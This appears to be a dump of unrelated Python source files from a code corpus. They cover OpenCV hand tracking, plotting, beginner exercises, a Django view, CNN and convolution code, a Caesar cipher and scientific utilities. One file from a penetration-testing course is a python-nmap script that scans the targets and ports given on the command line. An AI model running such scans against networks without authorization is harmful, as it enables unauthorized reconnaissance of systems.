tracker_types[ttype]\n\n if int(minor_ver) < 3:\n tracker = cv2.Tracker_create(tracker_type)\n else:\n if tracker_type == 'BOOSTING':\n tracker = cv2.TrackerBoosting_create()\n if tracker_type == 'MIL':\n tracker = cv2.TrackerMIL_create()\n if tracker_type == 'KCF':\n tracker = cv2.TrackerKCF_create()\n if tracker_type == 'TLD':\n tracker = cv2.TrackerTLD_create()\n if tracker_type == 'MEDIANFLOW':\n tracker = cv2.TrackerMedianFlow_create()\n if tracker_type == 'GOTURN':\n tracker = cv2.TrackerGOTURN_create()\n\n return tracker\n\n\n# Helper function for applying a mask to an array ------\ndef mask_array(array, imask):\n if array.shape[:2] != imask.shape:\n raise Exception(\"Shapes of input and imask are incompatible\")\n output = np.zeros_like(array, dtype=np.uint8)\n for i, row in enumerate(imask):\n output[i, row] = array[i, row]\n return output\n\n\n# Begin capturing video -------------------------\nvideo = cv2.VideoCapture(\"http://192.168.1.3:8080/video\")\nif not video.isOpened():\n print(\"Error: Could not open video\")\n sys.exit()\n\n\n# Read first frame\nok, frame = video.read()\nif not ok:\n print(\"Error: Could not read video\")\n sys.exit()\n# Use First frame as initial background frame\nbg = frame.copy()\n\n\n# Kernel for erosion and dilation of masks\nkernel = np.ones((3,3), np.uint8)\n\n\n# Tracking\n# Bounding Box -> (TopRightX, TopRightY, Width, Height)\nbbox_initial = (200, 130, 240, 240)\nbbox = bbox_initial\n# Tracking status, -1 for not tracking, 0 for unsuccessful tracking, 1 for successful tracking\ntracking = -1\n\n\n# Text display positions\npositions = {\n 'hand_pose': (15, 40),\n 'fps': (15, 20)\n}\n\n\n\n\n\n# Capture, Process, display loop\nwhile True:\n # Read a new frame\n ok, frame = video.read()\n display = frame.copy()\n if not ok:\n break\n\n # Start timer\n timer = cv2.getTickCount()\n\n # Processing ---------------------------\n # First find the absolute difference between the two images\n diff = cv2.absdiff(bg, frame)\n mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n # Threshold the mask\n th, thresh = cv2.threshold(mask, 30, 255, cv2.THRESH_BINARY)\n # Opening, closing and dilation\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n img_dilation = cv2.dilate(closing, kernel, iterations=2)\n # Get mask indexes\n imask = img_dilation > 0\n # Get foreground from mask\n foreground = mask_array(frame, imask)\n foreground_display = foreground.copy()\n\n # if tracking is active, update the tracker\n if tracking != -1:\n tracking, bbox = tracker.update(foreground)\n tracking = int(tracking)\n\n # Use numpy array indexing to crop the foreground frame\n hand_crop = img_dilation[\n int(bbox[1]):int(bbox[1]+bbox[3]),\n int(bbox[0]):int(bbox[0]+bbox[2])\n ]\n\n # Draw bounding box\n p1 = (int(bbox[0]), int(bbox[1]))\n p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n cv2.rectangle(foreground_display, p1, p2, (255, 0, 0), 2, 1)\n cv2.rectangle(display, p1, p2, (255, 0, 0), 2, 1)\n\n # Calculate Frames per second (FPS) ---------------------\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n # Display FPS on frame\n cv2.putText(\n foreground_display,\n \"FPS: \" + str(int(fps)),\n positions['fps'],\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.65,\n (50, 170, 50),\n 2\n )\n cv2.putText(\n display,\n \"FPS: \" + str(int(fps)),\n positions['fps'],\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.65,\n (50, 170, 50),\n 2\n )\n\n # Display result ---------------------------\n cv2.imshow(\"display\", display)\n # Display diff\n #cv2.imshow(\"diff\", diff)\n # Display thresh\n #cv2.imshow(\"thresh\", thresh)\n # Display mask\n #cv2.imshow(\"img_dilation\", img_dilation)\n try:\n # Display hand_crop\n cv2.imshow(\"hand_crop\", hand_crop)\n except:\n pass\n # Display foreground\n #cv2.imshow(\"foreground_display\", foreground_display)\n\n # Listen for Key Input --------------------\n k = cv2.waitKey(1) & 0xff\n\n if k == 27:\n # escape pressed\n break\n elif k == 114 or k == 112:\n # r pressed (reset background)\n bg = frame.copy()\n bbox = bbox_initial\n tracking = -1\n elif k == 116:\n # t pressed\n # Initialize tracker with first frame and bounding box\n tracker = setup_tracker(2)\n tracking = tracker.init(frame, bbox)\n elif k == 115:\n # s pressed\n img_count += 1\n fname = os.path.join(\n IMAGES_FOLDER,\n CURR_POSE,\n '{}_{}.jpg'.format(CURR_POSE, img_count)\n )\n print(fname)\n cv2.imwrite(fname, hand_crop)\n # elif k == 255: print(k)\n\ncv2.destroyAllWindows()\nvideo.release()\n","sub_path":"data-collection.py","file_name":"data-collection.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"227715166","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\".\\dustVisual.csv\", encoding=\"ANSI\")\nplt.title('O3 and PM10 matrix of scatterplot')\nplt.xlabel('O3')\nplt.ylabel('PM10')\n\nx0=df['O3']\nx1=df['PM10']\nplt.scatter(df['O3'],df['PM10'])\nplt.show()\n\n","sub_path":"Visualo3Pm10scattermatrix.py","file_name":"Visualo3Pm10scattermatrix.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284649957","text":"#less than 16: you can't drive\n#16 to 17: drive not vote\n#18 to 24: vote but not rent a car\n#older than 25: whatever dude\n#no else/ elif, only and or\n\nuinput = raw_input(\"Enter your age: \")\n\nage = int(uinput)\n\n\"\"\"if age <= 15: # If the guy is 16, he'll get here.\n print(\"No driving.\")\n \nif age == 16 or age == 17:\n print(\"driving, no voting.\")\n \nif age >= 18 and age <=24:\n print(\"vote yes, rental car no\")\n \nif age >= 25:\n print(\"you free.\")\"\"\"\n \nif age <= 15:\n print(\"no fun.\")\nelse:\n if age == 16 or age == 17:\n print(\"some fun.\")\n else:\n if age >= 18 and age <= 24:\n print(\"most fun, no rental cars.\")\n else:\n print(\"you're free.\")\n\n\n# Let's split this assignment in 3 different ones:\n# 11.a: No else, no elif. Just if\n# 11.b: Just if and else. nested statements\n# 11.c: Everything. If, elif and else.\n\n#\n\n\"\"\"elif age == 16 or age == 17: \n print(\"Driving, no voting.\")\n \nelse age >= 18 and age <= 24:\n print(\"Vote yes, rental car no.\")\n \nelse:\n print(\"You free.\")\"\"\"\n ","sub_path":"class-3/assignments/assignments_kellie/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383440898","text":"from BaseClass.EntityList import EntityList\nfrom BaseClass.EntityHandler import EntityHandler\nfrom BaseClass.APIRequest import APIRequest\n\nfrom Entity.Bug.Bug import Bug\n\nclass ProjectBugsHandler(EntityHandler):\n\n\t_projectID = None\n\n\tdef __init__(self, origin, projectID):\n\t\tsuper().__init__(origin)\n\n\t\tself._projectID = projectID\n\n\tdef create(self, fields):\n\t\tsuper().create(fields)\n\n\t\tsupports = {\n\t\t\t'title' : True,\n\t\t\t'status_id' : True,\n\t\t\t'severity_id' : True,\n\t\t\t'project_version' : True,\n\t\t\t'project_version_id' : True,\n\t\t\t'project_section_id' : False,\n\t\t\t'type_id' : False,\n\t\t\t'reproducibility_id' : False,\n\t\t \t'priority_id'\t\t : False,\n\t\t\t'assigned_user_id' : False,\n\t\t\t'description' : False,\n\t\t\t'expected_results' : False,\n\t\t\t'steps' : False,\n\t\t\t'platform' : False\n\t\t\t# 'device_model' : False,\n\t\t\t# 'device_model_id' : False,\n\t\t\t# 'os' : False,\n\t\t\t# 'os_version' : False,\n\t\t\t# 'os_version_id' : False,\n\t\t\t# 'browser_version_id' : False\n\t\t}\n\n\t\tif 'project_version_id' in fields.keys():\n\t\t\tsupports['project_version'] = False\n\t\telif 'project_version' in fields.keys():\n\t\t\tsupports['project_version_id'] = False\n\n\t\tif self.enforce(fields, supports):\n\t\t\tinitFields = {'include': 'steps,platform'}\n\t\t\tinitFields.update(fields)\n\t\t\tfields = initFields\n\n\t\t\treq = APIRequest(\n\t\t\t\tself._origin,\n\t\t\t\t'/v1/projects/' + str(self._projectID) + '/bugs',\n\t\t\t\t'POST',\n\t\t\t\t{'params': fields}\n\t\t\t)\n\n\t\t\treturn Bug(self._origin, req.exec_())\n\n\tdef all(self, filters = None):\n\t\tif filters is None:\n\t\t\tfilters = {}\n\n\t\tsuper().all(filters)\n\n\t\tinitFilters = {'include': 'steps,platform,attachments,comments,tags'}\n\t\tinitFilters.update(filters)\n\t\tfilters = initFilters\n\n\t\trequest = APIRequest(self._origin, '/v1/projects/' + str(self._projectID) + '/bugs', 'GET')\n\t\treturn EntityList(self._origin, request, Bug, filters)\n","sub_path":"leantesting/Handler/Project/ProjectBugsHandler.py","file_name":"ProjectBugsHandler.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"144349316","text":"import os\nfrom ConvPool import *\n\n\ndef exampleTestFilters():\n # List of filters for a 2D example\n edge2dFilter = np.array([[1, 1, 1],\n [1, -8, 1],\n [1, 1, 1]])\n\n sharpered2dFilter = np.array([[0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]])\n\n # List of filters for a 3D example\n sharpered3dFilter = np.array([[[0, 0, 0], [-1, -1, -1], [0, 0, 0]],\n [[-1, -1, -1], [5, 5, 5], [-1, -1, -1]],\n [[0, 0, 0], [-1, -1, -1], [0, 0, 0]]])\n sharpered3dFilterGreen = np.array([sharpered3dFilter - 1, sharpered3dFilter, sharpered3dFilter - 1])\n\n edge3dFilter = np.array([[[-1, -1, -1], [-1, -1, -1], [-1, -1, -1]],\n [[-1, -1, -1], [8, 8, 8], [-1, -1, -1]],\n [[-1, -1, -1], [-1, -1, -1], [-1, -1, -1]]])\n edge3dFilterRed = np.array([edge3dFilter - 1, edge3dFilter - 1, edge3dFilter])\n\n # Opening the image file\n filename = input('Enter the name of an image (absolute or relative path from {}): '.format(os.getcwd()))\n try:\n image2d = load2dImage(filename)\n image3d = load3dImage(filename)\n except:\n print('The file', filename, 'cannot be found or cannot be read')\n exit(1)\n\n # Image processing\n print('\\nProcessing image, it will take a while...\\n')\n ok = 0\n # 2D\n try:\n # Black and white image with padding and a 'sharped' filter\n saveImage('2dSharpered10Pad.jpg', convolution2d(image2d, sharpered2dFilter, 10))\n print('Generated 2dSharpered10Pad.jpg')\n ok += 1\n except:\n print('Error with 2dSharpered10Pad.jpg')\n try:\n # Black and white image with padding and a 'sharped' filter\n saveImage('2dEdge2Stride.jpg', convolution2d(image2d, edge2dFilter, 0, 2))\n print('Generated 2dEdge2Stride.jpg')\n ok += 1\n except:\n print('Error with 2dEdge2Stride.jpg')\n try:\n saveImage('2d4Pooled.jpg', pooling2d(image2d, 4, np.average))\n print('Generated 2d4Pooled.jpg')\n ok += 1\n except:\n print('Error with 2d4Pooled.jpg')\n\n # 3D\n try:\n saveImage('3dSharpered2Stride.jpg', convolution3d(image3d, sharpered3dFilterGreen, 0, 2))\n print('Generated 3dSharpered2Stride.jpg')\n ok += 1\n except:\n print('Error with 3dSharpered2Stride.jpg')\n try:\n saveImage('3dEdgeRed.jpg', convolution3d(image3d, edge3dFilterRed))\n print('Generated 3dEdgeRed.jpg')\n ok += 1\n except:\n print('Error with 3dEdgeRed.jpg')\n try:\n saveImage('3d2Pooled.jpg', pooling3d(image3d, 2, np.average))\n print('Generated 3d2Pooled.jpg')\n ok += 1\n except:\n print('Error with 3d2Pooled.jpg')\n\n print()\n print(ok, '/6 images generated\\n', sep='')\n print('Images saved on {}'.format(os.getcwd()))\n print('Done!')\n\n\nif __name__ == '__main__':\n print('Starting example test...')\n os.chdir(os.path.dirname(os.path.realpath(__file__)))\n exampleTestFilters()\n","sub_path":"ExampleTest.py","file_name":"ExampleTest.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"430393482","text":"#!/usr/bin/env python\nimport sys\ntry:\n import nmap\nexcept:\n sys.exit(\"[!] Install the nmap library: pip install python-nmap\")\n\n# Argument Validator\nif len(sys.argv) != 3:\n sys.exit(\"[!] Please provide two arguments the first being the targets the second the ports\")\n\nports = str(sys.argv[2])\naddrs = str(sys.argv[1])\n\nscanner = nmap.PortScanner()\nscanner.scan(addrs, ports)\n\nfor host in scanner.all_hosts():\n if not scanner[host].hostname():\n print(\"The host's IP address is %s and it's hostname was not found\" %host)\n else:\n print(\"The host's IP address is %s and it's hostname is %s\" %(host, scanner[host].hostname()))\n","sub_path":"PenetrationTesting/Module1/Chap03/nmap_scanner.py","file_name":"nmap_scanner.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180919739","text":"\"\"\"\nTrain in syllable localizer (ka, fi, nu) test in task\n\"\"\"\nimport pickle\nimport os.path as op\nimport pandas as pd\nfrom data.R1022_160204 import meg_files, session\n\n# data_path = '/media/DATA/Pro/Projects/NewYork/audio_wm/data/'\ndata_path = op.join('/media/jrking/harddrive/Audio_sequence/data/', session)\n\nruns = meg_files.query('typ == \"main\"')\nall_events = list()\nfor ii, run in runs.iterrows():\n bhv = op.join(data_path, run.bhv)\n\n # Read behavior file and make event DataFrame\n with open(bhv, 'rb') as f:\n bhv = pickle.load(f)\n events = list()\n for t, trial in enumerate(bhv.entries):\n for typ in ['target', 'probe']:\n for n in range(trial['n_sounds']):\n mismatch = trial['mismatch_position'] == n and typ == 'probe'\n events.append(dict(\n onset=trial['trigger_on_%s_%i' % (typ, n)],\n offset=trial['trigger_off_%s_%i' % (typ, n)],\n trigger=trial['trigger_value_%s_%i' % (typ, n)],\n sound=trial[typ][n].split('_f5')[0],\n type=typ, trial=t, sound_idx=n,\n mismatch=mismatch,\n mismatch_position=trial['mismatch_position']))\n all_events += events\nevents_main = pd.DataFrame(all_events)\nwith open(op.join(data_path, 'sounds-eve.pkl'), 'wb') as f:\n pickle.dump(events_main, f)\n","sub_path":"scripts/analysis/pilots/R1022_2.4.16/get_behavior.py","file_name":"get_behavior.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617490534","text":"# Contextualy irrelevant features for Obesity\nnoncontext = np.array(['MAMMOUSE','PAPTEST','BPMED','TEETHLOST','DENTAL']) \n# Already known effects of Obesity\nknown_effects_of_obesity = np.array(['CHD','BPHIGH','ARTHRITIS','DIABETES','HIGHCHOL','PHLTH','KIDNEY','STROKE'])\n# Drop above two from our dataframe\ncensus_data_Obesity = census_data_req.drop(np.concatenate([noncontext,known_effects_of_obesity]),axis=1)\ncensus_data_Obesity.drop(['MHLTH','COREM','COPD','COLON_SCREEN'],axis=1,inplace=True)\n\n# Contextualy irrelevant features for Cancer\nnoncontext_cancer = np.array(['MAMMOUSE','TEETHLOST','DENTAL']) \n# Drop above two from our dataframe\ncensus_data_Cancer = census_data_req.drop(np.concatenate([noncontext_cancer]),axis=1)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159422806","text":"import numpy as np\n\nimport h5py\nimport time\nimport copy\nfrom random import randint\n\n############################\n# SINGLE HIDDEN LAYER #\n# MULTIPLE KERNELS #\n############################\n\n\n\n# Elementwise ReLU nonlinearity to produce the hidden layer\ndef sigma(Z):\n return np.maximum(Z,0,Z)\n\n# Convolution of matrix X with the filter K\ndef convolution(X, K, stride):\n #col_stride = row_stride = X[0,0].itemsize\n\n\n\n\n Z = np.zeros((X.shape[0]-K.shape[0]+1, X.shape[1]-K.shape[1]+1, K.shape[2]))\n for m in range(0, Z.shape[0]-1, stride):\n for n in range(0, Z.shape[1]-1, stride):\n for k in range(0, Z.shape[2]):\n Z[m,n,k] = np.vdot(X[m:m+K.shape[0], n:n+K.shape[1]], K[:,:,k])\n return Z\n\ndef hidden_linear(H, W, bk):\n U = np.zeros((W.shape[0]))\n for k in range(W.shape[0]):\n U[k] = np.vdot(W[k], H) + bk[k]\n\n return U\n\n# [000,,,1,,,,00000]\ndef e(elem, K):\n ret = np.zeros(K)\n ret[elem] = 1\n return ret\n\n# Softmax Function\ndef softmax(vec):\n #assuming vec is 1-d\n exp_vec = np.exp(vec)\n vsum = np.float32(1/np.float32(sum(exp_vec)))\n exp_vec *= vsum\n return exp_vec\n\ndef sigma_prime(Z):\n return (1/1+np.exp(-1*Z))\n\n\ndef partial_K(sigma_prime, delta, X):\n return convolution(X, (sigma_prime*delta), 1)\n\n\ndef partial_U(soft, e_Y):\n return -1*(e_Y-soft)\n\n\ndef partial_W(partial_b, H):\n ret = np.zeros((partial_b.shape[0], H.shape[0], H.shape[1], H.shape[2]))\n for i in range(ret.shape[0]):\n ret[i] = partial_b[i]*H\n return ret\n\ndef delta(W, partial_u):\n delt = np.zeros((W.shape[1], W.shape[2], W.shape[3]))\n for i in range(partial_u.shape[0]):\n delt += partial_u[i]*W[i]\n return delt\n\n\ndef param_update(param, ALPHA, grad):\n return param - (ALPHA*grad)\n\n# def final_param(param):\n# sum = param[0]\n# for i in range(1, param.shape[0]):\n# sum += param[i]\n\n# return sum\n\n \n\n\n\n\nMNIST_data = h5py.File('../MNISTdata.hdf5', 'r')\n\nx_train = np.float32(MNIST_data['x_train'][:])\ny_train = np.int32(np.array(MNIST_data['y_train'][:, 0]))\nx_test = np.float32(MNIST_data['x_test'][:])\ny_test = np.int32(np.array(MNIST_data['y_test'][:, 0]))\n\nMNIST_data.close()\n\n#######################################################################\ndef NN(EPOCH, ALPHA, filter_dim):\n # IMPLEMENT Neural Network\n\n num_inputs = 28*28\n input_dim = 28\n num_outputs = 10\n num_filters = 32\n K = np.random.randn(filter_dim, filter_dim, num_filters) / np.sqrt(num_filters)\n b = np.random.randn(num_outputs) / np.sqrt(num_outputs)\n W = np.random.randn(num_outputs, input_dim - filter_dim + 1, input_dim - filter_dim + 1, num_filters) / np.sqrt(input_dim - filter_dim + 1)\n\n for ep in range(EPOCH):\n print(ep)\n shuffle = np.arange(x_train.shape[0])\n np.random.shuffle(shuffle)\n shuffle_x = x_train[shuffle]\n shuffle_y = y_train[shuffle]\n for i in range(len(shuffle_x)):\n print(i)\n\n X = (shuffle_x[i]).reshape((28,28))\n\n # FORWARD STEP\n Z = convolution(X, K, 1)\n H = sigma(Z)\n U = hidden_linear(H,W,b)\n soft_x = softmax(U)\n e_y = e(shuffle_y[i], num_outputs)\n\n # CALCULATE PARTIAL DERIVATIVES\n par_u = partial_U(soft_x, e_y)\n par_w = partial_W(par_u, H)\n delt = delta(W, par_u)\n par_k = partial_K(sigma_prime(Z), delt, X)\n\n # UPDATE PARAMETERS\n\n K = param_update(K, ALPHA, par_k)\n W = param_update(W, ALPHA, par_w)\n b = param_update(b, ALPHA, par_u)\n\n\n #final_K = final_param(K)\n #final_W = final_param(W)\n\n\n #######################################################################\n\n # Test Data\n\n total_correct = 0\n\n for n in range(len(x_test)):\n y = y_test[n]\n x = x_test[n][:]\n x = x.reshape((28,28))\n Z = convolution(x, K, 1)\n H = sigma(Z)\n U = hidden_linear(H, W, b)\n soft_x = softmax(U)\n prediction = np.argmax(soft_x)\n if (prediction == y):\n total_correct += 1\n\n print (total_correct/np.float(len(x_test)))\n\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 1, Filter = 5\")\nNN(1, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 2, Filter = 5\")\nNN(2, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 3, Filter = 5\")\nNN(3, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 4, Filter = 5\")\nNN(4, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 5, Filter = 5\")\nNN(5, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 1, Filter = 8\")\n# NN(1, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 2, Filter = 8\")\n# NN(2, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 3, Filter = 8\")\n# NN(3, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 2, Filter = 8\")\n# NN(4, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n\n","sub_path":"cs398/deep-learning/Convolution_NN/multiple_filter_conv.py","file_name":"multiple_filter_conv.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553223713","text":"from django.shortcuts import render,redirect\nfrom .models import Entry\nfrom django.contrib.auth.models import User\n\n# Create your views here. \ndef home(request):\n log_user=request.user\n entries = Entry.objects.filter(user=log_user).order_by('-date_posted') \n return render(request,'home.html',{'m':entries})\n # entries = Entry.objects.order_by('-date_posted')\n # context = {'entries' : entries}\n #return render(request,'home.html',context)\n\ndef add(request):\n if request.method == 'POST':\n data=request.POST['data']\n new=Entry(text=data, user=request.user)\n new.save()\n log_user=request.user\n entries = Entry.objects.filter(user=log_user).order_by('-date_posted')\n return render(request,'home.html',{'m':entries})\n \n #if form.is_valid():\n # form.save()\n # return redirect('/') \n else:\n return render(request,'add.html')","sub_path":"entries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"133721904","text":"def ceasarCijfer():\n tekst = input(\"Geef een tekst: \")\n rotatie = int(input(\"Geef een rotatie: \"))\n alfabet = 'aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'\n ceasarCode = ''\n for character in tekst:\n if character in alfabet:\n a = alfabet.index(character)\n if a > (len(alfabet) - rotatie*2):\n index = rotatie*2 - (len(alfabet) - a)\n ceasarCode += alfabet[index]\n else:\n ceasarCode += alfabet[a+rotatie*2]\n else:\n ceasarCode += character\n\n print(ceasarCode)\n\n\nceasarCijfer()","sub_path":"Ceasarcijfer.py","file_name":"Ceasarcijfer.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"359169353","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nTest schemas module\n\"\"\"\nimport pytest\n\npytest.importorskip(\n \"watertap.edb.schemas\", reason=\"Missing optional dependencies for EDB schemas\"\n)\nfrom ..schemas import schemas\nfrom ..data_model import Reaction\n\n\n@pytest.mark.unit\ndef test_schemas():\n assert \"$schema\" in schemas[\"component\"]\n assert \"$schema\" in schemas[\"reaction\"]\n\n\n@pytest.mark.unit\ndef test_reaction_order_required():\n input = {\n \"name\": \"foo\",\n \"components\": [],\n \"elements\": [\"Ca\", \"O\", \"H\"],\n # valid chemistry? no. useful? yes.\n Reaction.NAMES.param: {\n \"reaction_order\": {\n \"Liq\": {\"B\": 2, \"C\": 1, \"H\": 1},\n \"Vap\": {\"B\": 1, \"C\": -2, \"H\": 1},\n \"Sol\": {\"B\": -1, \"C\": 2, \"H\": 0},\n }\n },\n \"type\": \"equilibrium\",\n }\n r = Reaction(input) # should be OK\n del input[Reaction.NAMES.param][\"reaction_order\"]\n r = Reaction(input) # still should be ok\n","sub_path":"watertap/edb/tests/test_schemas.py","file_name":"test_schemas.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246176692","text":"# # Is Unique: \n# Implement an algorithm to determine if a string has all unique characters. \n# \n# What if you cannot use additional data structures?\n\n\ndef is_unique_dict(inputs):\n d = {}\n for cha in inputs:\n if cha in d:\n return False\n else:\n d[cha] = 0\n return True\n\ndef is_unique_arr(inputs):\n arr = [False]*128\n for cha in inputs:\n if arr[ord(cha)]:\n return False\n else:\n arr[ord(cha)] = True\n return True\n\ndef is_unique_bit(inputs):\n checker = 0\n for cha in inputs:\n cha_in_num = ord(cha)-ord(\" \")\n if checker & 1 << cha_in_num:\n return False\n else: \n checker |= 1 << cha_in_num\n return True \n","sub_path":"01_ArraysAndStrings/Python/IsUnique.py","file_name":"IsUnique.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642917456","text":"from __future__ import print_function\nfrom IPython import display\nimport torch\nfrom torch import nn\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nfrom torchvision import transforms, datasets\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.tri as mtri\n#%matplotlib inline\nfrom matplotlib import colors\nfrom IPython import display\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport plotly.graph_objs as go\nfrom plotly.graph_objs import Scatter, Figure, Layout\nimport numpy as np\nimport time\nimport math\nimport pytorch_fft.fft.autograd as fft\npi = math.pi\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--test_id', type=int, required=True, help='id of current test')\nparser.add_argument('--datasize', type=int, default=2**12, help='size of 1D signal')\nparser.add_argument('--lambda_true', type=float, default=0.025, help='intensity of poisson from true data')\nparser.add_argument('--nepochs', type=int, default=300, help='number of total epochs')\nparser.add_argument('--batchsize', type=int, default=64, help='batchsize for each training step')\nparser.add_argument('--layer2', type=bool, default=True, help='whether to do second layer scattering')\nparser.add_argument('--l2', type=bool, default=False, help='whether to do l2 norm in scattering')\nparser.add_argument('--norm', type=bool, default=False, help='whether to add scattering of normalized signal')\nparser.add_argument('--ntestsample', type=int, default=16, help='number of samples for testing, >= 16')\nparser.add_argument('--p1', type=int, default=1, help='scattering moments for the first layer')\nparser.add_argument('--p2', type=int, default=1, help='scattering moments for the second layer')\nparser.add_argument('--output_scale', type=float, default=5, help='maximal height of output signal from generator')\nparser.add_argument('--Q', type=int, default=2, help='scale intervals for defining wavelets')\nparser.add_argument('--J', type=int, default=4, help='largest scale for defining wavelets')\nparser.add_argument('--xi', type=float, default=np.asarray([pi/6]), help='central frequency of 1st layer wavelets')\nparser.add_argument('--xi2', type=float, default=np.asarray([pi/4]), help='central frequency of 2nd layer wavelets')\nparser.add_argument('--c', type=int, default=2, help='s2/s1, proportion of wavelet scales between 2nd and 1st layer')\nopt = parser.parse_args()\n\nntest=opt.test_id\nn = opt.datasize\nlambda_true = opt.lambda_true\nnum_epochs = opt.nepochs\nbatch_size = opt.batchsize\nlayer2 = opt.layer2\nl2 = opt.l2\nnorm = opt.norm\nnum_test_samples = opt.ntestsample\noutput_scale = opt.output_scale\np1 = opt.p1\np2 = opt.p2\nQ = opt.Q\nJ = opt.J\nxi = opt.xi\nxi2 = opt.xi2\nc = opt.c\nprint('parameter defined!')\n\nx_data = np.load('./data/x_homo_regular.npy')\nndata = x_data.shape[0]\nx_data = torch.from_numpy(np.reshape(x_data,[-1,1,n])).float()\nx_fake_data = np.load('./data/x_homo_fake.npy')\nx_fake_data = torch.from_numpy(np.reshape(x_fake_data,[-1,1,n])).float()\nnbatch = ndata // batch_size # number of batches in one epoch\nprint('Data loaded!')\n\nclass scattering(torch.nn.Module):\n def __init__(self, g_real_hat, g_imag_hat, g2_real_hat, g2_imag_hat, l2, layer2, norm, batch_size, n, p1, p2, eps = 1e-7):\n # Two-layer scattering module.\n \n # g_real_hat: real part of wavelets in frequency in the first scattering layer\n # g_imag_hat: imagery part of wavelets in frequency in the first scattering layer\n # g2_real_hat: real part of wavelets in frequency in the second scattering layer\n # g2_imag_hat: imagery part of wavelets in frequency in the second scattering layer\n # l2, layer2, norm: whether to do l2 norm, second layer scattering and signal normalization with heights {1,-1}\n # batch_size: length of batch\n # n: signal length\n # p1, p2: moments of first and second layer\n \n super(scattering, self).__init__()\n self.g_real_hat = g_real_hat.unsqueeze(0) # shape 1 * nwave * n\n self.g_imag_hat = g_imag_hat.unsqueeze(0)\n self.g2_real_hat = g2_real_hat.unsqueeze(0) # shape 1 * nwave * n\n self.g2_imag_hat = g2_imag_hat.unsqueeze(0)\n self.batch_size = batch_size\n self.nwave = g_real_hat.shape[0]\n self.x_imag = torch.zeros(self.batch_size, 1, n, 1) # imagery part of x is zero\n self.x2_imag = torch.zeros(self.batch_size, self.nwave, n, 1) \n if torch.cuda.is_available():\n self.x_imag = self.x_imag.cuda()\n self.x2_imag = self.x2_imag.cuda()\n \n self.layer2 = layer2\n self.norm = norm\n self.p1 = p1\n self.p2 = p2\n self.eps = eps \n 